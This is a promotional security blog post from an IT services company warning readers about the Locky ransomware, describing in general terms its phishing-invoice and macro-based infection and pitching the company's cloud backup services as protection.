Have You Opened Any Invoice Attachments Lately?
Just this past week, a new ransomware called Locky was discovered that has security experts a little more than concerned. In fact, many IT service providers have found that it is spreading at an alarming rate, and is able to bypass antivirus, spam filtering, and web filtering solutions. That being said, if you regularly (or ever) are required to open attachments such as word documents or invoices, you will want to read this.
Security researchers have recently discovered that Locky is achieving approximately 4000 new infections per hour, or around 100,000 per day. This means that statistically, you, could very well be a target. Locky is very similar to the CryptoWall virus, where it completely changes the filenames to encrypted files to make it very difficult to restore the right data, and at this time, there is no known way to decrypt files that have been encrypted by Locky. Make no mistake, this is far from your average easy to detect and remove ransomware, Locky means business.
What is Locky?
Aside from being far more than a minor nuisance, Locky, is a new strain of ransomware that uses two forms of social engineering to encrypt:
- Unmapped Network shares
Much like its heavy hitting ransomware predecessors, it relies on email phishing to install, and thus far, experts report that these hackers are duping victims into downloading malicious attachments disguised as invoices. Security experts have been warning people to be cautious of emails that have subjects similar to ATTN: Invoice J-235434.
How does Locky work?
Now it’s not exactly a state secret that hackers often use social engineering to fool targets into believing that they are trustworthy by reaching out to them either online or over the phone. Fortunately, for now, Locky needs the targeted person to comply in order for it to be successfully launched. However, after examining the sophistication of the text in the body the Locky email, it is pretty easy to see how attackers are able to trick users into opening these attachments.
The attack doesn’t end with a deceiving subject title however, Locky has another security layer to get past, and how it manages to do this is deviously clever.
Once the attached document (or invoice) has been opened, the text will appear illegible or scrambled, this is when you will be prompted to enable macros, once you have done this, the macros will download an executable from a remote server and execute it. The file that is downloaded by the macro will be stored in the %Temp% folder and executed – the executable is the Locky ransomware, that when started will begin to encrypt the files on your computer and network.
How to protect yourself
I’m sure that disabling macros across your entire company has come to mind right about now. But this isn’t exactly a feasible option considering your workforce more than likely work with a lot of legacy codes that rely heavily on macros.
Instead, you will want to have weapons-grade backup/restore functionality. Hammett Technologies, offers secure backups that will store and protect your data against ransomware attacks such as this, so regardless of what malicious attack you face, your data will remain safe and accessible. You can read more about Hammett Technologies comprehensive Cloud Backup here https://www.hammett-tech.com/cloud-based-backup/ .
Hammett Technologies offers comprehensive security and IT solution services that can safeguard your organization from a variety of malicious and targeted attacks. Contact us today at (443) 216-9999 or send us an email at email@example.com for a free no obligation consultation pertaining to our security and Cloud backup offerings.